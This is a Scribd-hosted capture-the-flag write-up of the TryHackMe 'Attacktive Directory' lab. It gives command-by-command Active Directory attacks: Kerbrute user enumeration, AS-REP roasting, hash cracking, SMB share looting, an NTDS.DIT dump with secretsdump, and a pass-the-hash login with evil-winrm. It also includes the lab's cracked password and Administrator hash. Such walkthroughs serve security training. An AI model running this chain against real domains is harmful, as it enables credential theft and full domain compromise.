Scribd Logo
Upload

Welcome to Scribd!

    • 30 views

    Attractive Directory Report THM

    Uploaded by

    sakitazeyek
    The document details the steps taken to exploit an Active Directory environment hosted on a machine called Attacktive Directory. Various enumeration and exploitation techniques are used to escalate privileges from an initial user to domain administrator, including bruteforcing Kerberos tickets, AS-REP roasting, dumping domain hashes, and cracking hashes. Three flags are obtained from user desktops after accessing the domain admin account.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    Attractive Directory Report THM

    Uploaded by

    sakitazeyek
    30 views15 pages
    The document details the steps taken to exploit an Active Directory environment hosted on a machine called Attacktive Directory. Various enumeration and exploitation techniques are used to escalate privileges from an initial user to domain administrator, including bruteforcing Kerberos tickets, AS-REP roasting, dumping domain hashes, and cracking hashes. Three flags are obtained from user desktops after accessing the domain admin account.

    Original Title

    Attractive+Directory+Report+THM

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    The document details the steps taken to exploit an Active Directory environment hosted on a machine called Attacktive Directory. Various enumeration and exploitation techniques are used to escalate privileges from an initial user to domain administrator, including bruteforcing Kerberos tickets, AS-REP roasting, dumping domain hashes, and cracking hashes. Three flags are obtained from user desktops after accessing the domain admin account.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    30 views15 pages

    Attractive Directory Report THM

    Uploaded by

    sakitazeyek
    The document details the steps taken to exploit an Active Directory environment hosted on a machine called Attacktive Directory. Various enumeration and exploitation techniques are used to escalate privileges from an initial user to domain administrator, including bruteforcing Kerberos tickets, AS-REP roasting, dumping domain hashes, and cracking hashes. Three flags are obtained from user desktops after accessing the domain admin account.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    You are on page 1of 15

    TRYHACKME | ATTRACTIVE

    DIRECTORY REPORT
    Machine Used : Kali Linux

    Zaur Qasimov
    07.07.2022

    Content:
    1. Intro | Setup
    1. Installing Impacket
    2. Installing Bloodhound and Neo4j
    2. Enumeration | Welcome to Attacktive Directory
    1. What tool will allow us to enumerate port 139/445?
    2. What is the NetBIOS-Domain Name of the machine?
    3. What invalid TLD do people commonly use for their Active Directory Domain?
    3. Enumeration | Enumerating Users via Kerberos
    1. What command within Kerbrute will allow us to enumerate valid usernames?
    2. What notable account is discovered? (These should jump out at you)
    3. What is the other notable account is discovered? (These should jump out at you)
    4. Exploitation | Abusing Kerberos
    1. We have two user accounts that we could potentially query a ticket from. Which user account can
    you query a ticket from with no password?
    2. Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the
    KDC? (Specify the full name)
    3. What mode is the hash?
    4. Now crack the hash with the modified password list provided, what is the user accounts password?
    5. Enumeration | Back to the Basics
    1. What utility can we use to map remote SMB shares?
    2. Which option will list shares?
    3. How many remote shares is the server listing?
    4. There is one particular share that we have access to that contains a text file. Which share is it?
    5. What is the content of the file?
    6. Decoding the contents of the file, what is the full contents?
    6. Domain Privilege Escalation | Elevating Privileges within the Domain
    1. What method allowed us to dump NTDS.DIT?
    2. What is the Administrators NTLM hash?
    3. What method of attack could allow us to authenticate as the user without the password?
    4. Using a tool called Evil-WinRM what option will allow us to use a hash?
    7. Flag Submission | Flag Submission Panel
    1. svc-admin flag
    2. backup flag
    3. Administrator flag

    1. Intro | Setup
    Attacktive Directory is a medium-level machine that is hosting a Windows Active
    Directory as said in the room that more than 99% of Corporate Networks run on
    Windows Active Directory. First, we connect to TryHackMe's network using the
    OpenVPN configuration file.
    Command: openvpn Zaur.Qasimov.ovpn
    Then we click on "Start the machine" on the upper right side of the section.
    IP Address: 10.10.84.141

    IMPACKET INSTALLATION
    Impacket has always been very difficult to install correctly. Any missing steps often
    result in a brunch of errors when running tools from Impacket. Thus, TryHackMe
    (THM) provided us steps to install correctly.If you are using THM’s attack machine,
    Impacket and Bloodhound have already been installed.

    Firstly, we have to clone Impacket from the GitHub repository.


    kali@kali~$ sudo git clone https://github.com/SecureAuthCorp/impacket.git
    /opt/impacket

    Next, we shall install the requirements.


    kali@kali~$ sudo pip3 install -r /opt/impacket/requirements.txt

    Finally, we can run the Python installation script.


    kali@kali~$ cd /opt/impacket/ && sudo python3 ./setup.py install

    BLOODHOUND AND NEO4J INSTALLATION


    apt install bloodhound neo4j

    # if problem faced
    apt update && apt upgrade

    2.Enumeration | Welcome to Attacktive


    Directory
    We first have to use nmap to check out the services available on the Domain Controller
    (DC). In this simple lab setup, there is only the DC available. Of course with different
    Active Directory (AD) environments, we may have to enumerate and attack other
    workstations before we have a shot to access the DC.

    Command:nmap –sV –sC 10.10.84.141


    1.What tool will allow us to enumerate port 139/445?

    We can also use enum4linux on port 139/445 to enumerate the NetBIOS for information
    such as the existing usernames, NetBIOS-Domain Name, SID, etc.
    Command: enum4linux 10.10.84.141

    2.What is the NetBIOS-Domain Name of the machine?


    You can see from the result that the domain name is THM-AD
    3.What invalid TLD do people commonly use for their Active Directory Domain?

    Let's look at the hint we were given.

    You can also see from the hint that the Active Directory Domain name is
    spookysec.local. Here the invalid TLD is .local

    3.Enumeration | Enumerating Users via


    Kerberos
    Based on TryHackMe (THM), we are recommended to use Kerbrute for this challenge
    to brute force Kerberos (key authentication service in Active Directory) to enumerate
    usernames and passwords. A modified username list and password list have been
    given to us. Note that it is actually not recommended to brute force credentials due to
    account lockout policies.

    Firstly, I downloaded Kerbrute into my Kali and change its execution permission.
    Command:
    kali@kali~$ wget
    https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
    kali@kali~$ chmod +x kerbrute_linux_amd64
    Next, I downloaded both the user list and password list.
    Command:
    kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-
    tools/master/userlist.txt
    kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-
    tools/master/passwordlist.txt

    Let's get acquainted with how to use the tool now.


    Command: ./kerbrute_linux_amd64 --help

    1.What command within Kerbrute will allow us to enumerate valid usernames?

    userenum - Enumerate valid domain usernames via Kerberos


    As you can see, we will need the userenum command for this process.

    2.What notable account is discovered? (These should jump out at you)


    Command: ./kerbrute_linux_amd64 userenum --dc=10.10.84.141 -d=spookysec.local.
    /root/Downloads/userlist.txt

    There are 2 users that may be of interest to us: svc-admin and backup

    4.Exploitation | Abusing Kerberos

    In this challenge, we can ASREPRoasting as a user account or more do not require pre-

    authentication details before requesting a Kerberos Ticket. Thus, we can use Impacket’s

    /opt/impacket/examples/GetNPUsers.py to query ASReproastable accounts from the

    Key Distribution Center. However, we will need to provide a list of usernames

    1. We have two user accounts that we could potentially query a ticket from. Which

    user account can you query a ticket from with no password?

    We have only two unusual users svc-admin and backup let's try for both these using

    the GetNPUsers.py tool and we will find that it works for svc-admin only.
    Comamnd: GetNPUsers.py -no-pass -dc-ip 10.10.84.141 spookysec.local/svc-admin

    We will get the hash from the above command and we will store it in a file.

    2. Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we

    retrieve from the KDC? (Specify the full name)

    Search for the tool on the Hashcat examples page and we will get something like here:

    From the image you can see that the type of the hash is Kerberos 5, etype 23, AS-REP.

    3. What mode is the hash?

    If we look at the left part of the picture, we see that the answer is 18200.
    4.Now crack the hash with the modified password list provided, what is the user

    accounts password?

    Let’s crack the hash now. Let’s determine our hash type. We will use the modified

    password list provided in the challenge to crack the hash using johnthereaper.

    Command: john --wordlist=passwordlist.txt --format=krb5asrep pass.txt

    İt should only take a few seconds to crack the hash on a virtual machine Kali. If you do
    it on your Windows host, it will be even faster. We should obtain the password
    “management2005”.

    5.Enumeration | Back to the Basics


    We can now attempt to enumerate SMB shared folders using our newly found
    credentials.
    Command: smbclient -L 10.10.82.185 -U svc-admin%management2005
    4.There is one particular share that we have access to that contains a text file. Which
    share is it?
    Going through each shared folder, I found an interesting folder to which I can login and
    see an interesting text file.

    Command: smbclient \\\\\10.10.82.185\\backup -U svc-admin%management2005

    5.What is the content of the file?


    I downloaded the text file and looked at its content.
    6.Decoding the contents of the file, what is the full contents?
    It looks like it is base64 encoded. Thus, decoding it allows us to see a valid credential.

    6.Domain Privilege Escalation | Elevating


    Privileges within the Domain
    Obtaining the credentials of backup allows us to have more privileges as the backup
    account in a Domain Controller (DC) This is because any changes to the Active
    Directory (AD) will reflect those changes in this backup account. As a result, we can
    obtain every user’s password hashes. To do so, we can use Impacket’s secretsdump.py.
    1. What method allowed us to dump NTDS.DIT?
    Command: python3 /opt/impacket/examples/secretsdump.py
    spookysec.local/backup:[email protected]
    As you can see from the image, the method is DRSUAPI.

    Finally, we will need to install evil-winrm to access the system since port 5985 for
    WinRM is open.
    Command: sudo gem install evil-winrm
    What is the Administrators NTLM hash?
    0e0363213e37b94221497260b0bcb4fc
    3. What method of attack could allow us to authenticate as the user without
    the password?
    4. Using a tool called Evil-WinRM what option will allow us to use a hash?
    Let's see how evil-winrm works.
    Command: evil-winrm –help

    As you can see the answer is –H

    8.Flag Submission | Flag Submission


    Panel
    Submit the flags for each user account. They can be located on each user’s desktop.
    We can just login into the administrator’s account which have access to other users’
    desktops.
    Command: evil-winrm -i 10.10.82.185 -u Administrator -H
    0e0363213e37b94221497260b0bcb4fc
    So we found the password flag of the administrator.

    Let's find the flag of svc-admin and backup in the same way.

    Svc-admin flag >>>


    Backup flag >>>

    You might also like